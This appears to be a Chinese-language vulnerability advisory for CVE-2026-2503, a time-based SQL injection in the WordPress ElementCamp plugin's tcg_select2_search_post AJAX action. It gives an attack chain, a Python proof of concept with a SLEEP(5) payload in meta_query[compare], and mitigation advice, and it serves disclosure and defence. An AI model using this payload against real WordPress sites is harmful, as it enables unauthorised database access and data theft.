CVE-2026-2503 CVSS 6.5 中危

CVE-2026-2503 WordPress ElementCamp插件SQL注入漏洞

披露日期: 2026-03-21

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-2503

漏洞类型

SQL注入

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

WordPress ElementCamp Plugin

漏洞概述

WordPress ElementCamp插件2.3.6及以下版本存在基于时间的SQL注入漏洞。该漏洞源于未对'meta_query[compare]'参数进行白名单校验，直接将其作为SQL操作符拼入查询中。这导致具备作者级及以上权限的认证攻击者可利用此漏洞，通过构造特定请求向现有查询追加SQL语句，从而成功提取数据库中的敏感信息。

技术细节

该漏洞位于ElementCamp插件的'tcg_select2_search_post' AJAX动作处理逻辑中。问题的核心在于代码直接接收用户提供的'meta_query[compare]'参数值，并将其作为SQL操作符拼接到数据库查询语句中，而未通过允许列表（allowlist）进行严格验证。尽管代码尝试使用esc_sql()函数对输入进行转义处理，但由于注入载荷是作为SQL操作符而非字符串值（不在引号包裹内）执行，esc_sql()无法有效防御此类攻击。因此，拥有作者级及以上权限的攻击者可以发送特制的AJAX请求，利用基于时间的盲注技术，在原有SQL查询后追加额外的查询语句，进而窃取数据库中的敏感信息。

攻击链分析

STEP 1

步骤1

攻击者枚举目标站点，确认其安装了WordPress ElementCamp插件且版本在2.3.6及以下。

STEP 2

步骤2

攻击者获取目标站点一个具备Author（作者）级或更高权限的账户凭证。

STEP 3

步骤3

攻击者使用该凭证登录，并向/wp-admin/admin-ajax.php发送POST请求，action为tcg_select2_search_post。

STEP 4

步骤4

在请求参数meta_query[compare]中注入恶意SQL操作符（如SLEEP(5)），利用基于时间的盲注技术提取数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC Concept for CVE-2026-2503
import requests

target_url = "http://target-wordpress.com/wp-admin/admin-ajax.php"
# Attacker needs valid session cookie (Author level or higher)
cookies = {
    "wordpress_logged_in_xxx": "..."
}

# Payload for time-based blind SQL injection using SLEEP
payload = "= (SELECT SLEEP(5))"

data = {
    "action": "tcg_select2_search_post",
    "meta_query[compare]": payload
}

response = requests.post(target_url, data=data, cookies=cookies)
# If response takes > 5 seconds, vulnerability is confirmed
print(f"Response status: {response.status_code}")
print(f"Response time: {response.elapsed.total_seconds()} seconds")

影响范围

WordPress ElementCamp Plugin <= 2.3.6

防御指南

临时缓解措施

建议立即检查并更新ElementCamp插件。若暂时无法更新，应禁用该插件或通过Web应用防火墙（WAF）规则拦截包含非常规SQL操作符的请求参数，以降低被攻击风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表